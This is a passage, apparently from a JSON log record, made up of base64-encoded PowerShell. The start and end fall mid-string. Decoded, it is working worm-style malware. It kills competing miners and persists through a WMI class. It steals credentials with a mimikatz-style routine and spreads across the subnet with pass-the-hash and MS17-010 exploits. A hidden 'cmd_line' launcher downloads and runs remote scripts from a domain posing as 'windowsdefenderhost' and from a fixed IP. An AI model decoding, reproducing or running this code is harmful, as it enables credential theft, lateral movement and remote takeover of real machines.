ANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAA